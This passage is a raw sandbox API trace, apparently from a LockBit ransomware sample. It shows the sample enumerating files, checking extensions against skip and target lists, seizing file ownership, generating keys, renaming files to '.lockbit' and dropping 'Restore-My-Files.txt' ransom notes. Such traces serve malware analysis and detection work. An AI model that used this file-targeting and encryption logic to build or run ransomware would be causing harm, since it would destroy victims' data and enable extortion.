lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.129] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x0, dwReserved1=0x0, cFileName="PassportMask.wmv", cAlternateFileName="")) returned 1 [0093.129] lstrcmpiW (lpString1=".", lpString2="PassportMask.wmv") returned -1 [0093.129] lstrcmpiW (lpString1="..", lpString2="PassportMask.wmv") returned -1 [0093.129] PathFindExtensionW (pszPath="PassportMask.wmv") returned=".wmv" [0093.129] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0093.129] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0093.130] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0093.130] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PassportMask.wmv") returned 1 [0093.131] lstrcmpiW (lpString1="ntldr", lpString2="PassportMask.wmv") returned -1 [0093.131] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PassportMask.wmv") returned -1 [0093.131] lstrcmpiW (lpString1="bootsect.bak", lpString2="PassportMask.wmv") returned -1 [0093.131] lstrcmpiW (lpString1="autorun.inf", lpString2="PassportMask.wmv") returned -1 [0093.131] lstrcmpiW (lpString1="thumbs.db", lpString2="PassportMask.wmv") returned 1 [0093.131] lstrcmpiW (lpString1="iconcache.db", lpString2="PassportMask.wmv") returned -1 [0093.131] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.131] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv") returned=".wmv" [0093.131] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0093.131] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0093.131] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0093.132] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0093.132] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv.lockbit") returned 76 [0093.132] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.134] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.136] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.136] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.137] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.138] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.138] RtlFreeAnsiString (AnsiString="\\") [0093.138] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x13dc) returned 0x0 [0093.138] malloc (_Size=0x200) returned 0x77d800 [0093.138] NtQueryInformationToken (in: TokenHandle=0x13dc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0093.139] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.139] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.139] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.139] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.140] CloseHandle (hObject=0x13dc) returned 1 [0093.140] free (_Block=0x77d800) [0093.140] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13dc [0093.140] CreateIoCompletionPort (FileHandle=0x13dc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.140] malloc (_Size=0x40068) returned 0x1ff1e60 [0093.140] GetFileSizeEx (in: hFile=0x13dc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=29268) returned 1 [0093.140] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.143] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.143] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0093.143] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0093.146] ReadFile (in: hFile=0x13dc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0093.154] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.154] malloc (_Size=0xae) returned 0x77d800 [0093.154] NtSetInformationFile (FileHandle=0x13dc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0093.155] free (_Block=0x77d800) [0093.155] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.155] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.155] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.155] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x0, dwReserved1=0x0, cFileName="PassportMask_PAL.wmv", cAlternateFileName="")) returned 1 [0093.155] lstrcmpiW (lpString1=".", lpString2="PassportMask_PAL.wmv") returned -1 [0093.155] lstrcmpiW (lpString1="..", lpString2="PassportMask_PAL.wmv") returned -1 [0093.155] PathFindExtensionW (pszPath="PassportMask_PAL.wmv") returned=".wmv" [0093.155] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0093.155] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0093.155] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0093.155] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0093.155] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0093.155] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0093.155] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0093.156] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0093.156] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PassportMask_PAL.wmv") returned 1 [0093.157] lstrcmpiW (lpString1="ntldr", lpString2="PassportMask_PAL.wmv") returned -1 [0093.157] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PassportMask_PAL.wmv") returned -1 [0093.157] lstrcmpiW (lpString1="bootsect.bak", lpString2="PassportMask_PAL.wmv") returned -1 [0093.157] lstrcmpiW (lpString1="autorun.inf", lpString2="PassportMask_PAL.wmv") returned -1 [0093.157] lstrcmpiW (lpString1="thumbs.db", lpString2="PassportMask_PAL.wmv") returned 1 [0093.157] lstrcmpiW (lpString1="iconcache.db", lpString2="PassportMask_PAL.wmv") returned -1 [0093.157] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\") returned="" [0093.157] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv") returned=".wmv" [0093.157] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0093.157] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0093.158] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0093.158] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0093.159] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0093.159] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv.lockbit") returned 80 [0093.159] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.161] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0093.162] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0093.162] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0093.164] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0093.165] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0093.165] RtlFreeAnsiString (AnsiString="\\") [0093.165] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x11a0) returned 0x0 [0093.165] malloc (_Size=0x200) returned 0x2071328 [0093.165] NtQueryInformationToken (in: TokenHandle=0x11a0, TokenInformationClass=0x1, TokenInformation=0x2071328, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x2071328, ReturnLength=0x3d6acd8) returned 0x0 [0093.165] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.165] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x2071330*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0093.165] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.166] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0093.166] CloseHandle (hObject=0x11a0) returned 1 [0093.166] free (_Block=0x2071328) [0093.166] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\passportmask_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x11a0 [0093.167] CreateIoCompletionPort (FileHandle=0x11a0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0093.167] malloc (_Size=0x40068) returned 0x3d70048 [0093.167] GetFileSizeEx (in: hFile=0x11a0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=29268) returned 1 [0093.167] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.169] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0093.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0093.184] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0093.184] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0093.184] ReadFile (in: hFile=0x11a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0093.186] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0093.186] malloc (_Size=0xb6) returned 0x77d800 [0093.186] NtSetInformationFile (FileHandle=0x11a0, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb6, FileInformationClass=0xa) returned 0x0 [0093.187] free (_Block=0x77d800) [0093.187] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\PassportMask_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel") returned 1 [0093.187] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt") returned 72 [0093.187] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0093.187] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727c06a1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727c06a1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport_mask_left.png", cAlternateFileName="")) returned 1 [0093.187] lstrcmpiW (lpString1=".", lpString2="passport_mask_left.png") returned -1 [0093.187] lstrcmpiW (lpString1="..", lpString2="passport_mask_left.png") returned -1 [0093.187] PathFindExtensionW (pszPath="passport_mask_left.png") returned=".png" [0093.187] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0093.188] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0093.188] lstrcmpiW (lpString1=".msp", lpString2=".png") 